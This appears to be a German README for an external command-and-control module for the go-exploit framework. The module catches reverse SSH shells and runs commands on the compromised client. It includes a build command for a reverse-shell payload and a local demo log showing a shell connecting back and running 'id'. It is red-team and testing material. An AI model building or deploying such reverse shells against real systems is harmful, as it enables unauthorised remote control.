Go-Modul für externes C2 für go-exploit, das Reverse-SSH-Shells abfängt und einen Server-Listener sowie einen Payload-Client bereitstellt, um benutzerdefinierte C2-Profile in Exploits zu integrieren.
Ein go-exploit externes C2-Modul, das Reverse-SSH-Shells unterstützt. Es dient zusätzlich als Demonstration, wie man externe C2-Profile in seine bevorzugten Payloads integriert. Das Ziel ist nicht, eine vollständig weaponisierte Payload mit Evasion und fortgeschrittenen Techniken bereitzustellen, sondern zu zeigen, wie man Kanäle für Payloads erstellt, die stärkere Evasion-Module implementieren und sich leicht in go-exploit integrieren lassen können.
c2ssh, das die Schnittstellen und Strukturen für die Einrichtung eines Servers zum Abfangen von SSH-Payloads implementiert./payload enthält die Implementierung für Payloads, die von einem Exploit verwendet werden sollen; dies ist funktional der SSH-Client und ein dünner Wrapper um exec, basierend auf der Serverantwort./example enthält einen Selbstausbeutungs-Test, der eine kompilierte Beispiel-Payload ausführtgo build -ldflags "-s -w -X main.Rshost=127.0.0.1 -X main.Rsport=2223" -o reverse_shell
poptart@grimm $ go run example/exploit.go -lhost 127.0.0.1 -lport 2222 -rhost 127.0.0.1 -rport 1337 -e -fll DEBUG -ell DEBUG -t 0
time=2024-08-06T12:09:02.762-06:00 level=DEBUG msg="Using the HTTP User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/125.0.0.0 Safari/537.36"
time=2024-08-06T12:09:02.763-06:00 level=STATUS msg="Starting target" index=0 host=127.0.0.1 port=1337 ssl=false "ssl auto"=false
time=2024-08-06T12:09:02.763-06:00 level=DEBUG msg="External SSH Listener starting: 127.0.0.1:2222"
time=2024-08-06T12:09:02.766-06:00 level=DEBUG msg="SSH: Handshaking for 127.0.0.1:38878"
time=2024-08-06T12:09:02.768-06:00 level=STATUS msg="Active shell SSH: Connection accepted from [email protected]:38878 session: 451e905e22ffbc7ab6235ad73379eeea2c65ba532405d81a431e1c5159ba1179 (SSH-2.0-OpenSSH_9.7)"
id
time=2024-08-06T12:09:04.725-06:00 level=STATUS msg="Running command on SSH client: 'id'"
time=2024-08-06T12:09:08.812-06:00 level=SUCCESS msg="uid=1000(poptart) gid=100(users) groups=100(users),1(wheel),67(libvirtd)\n"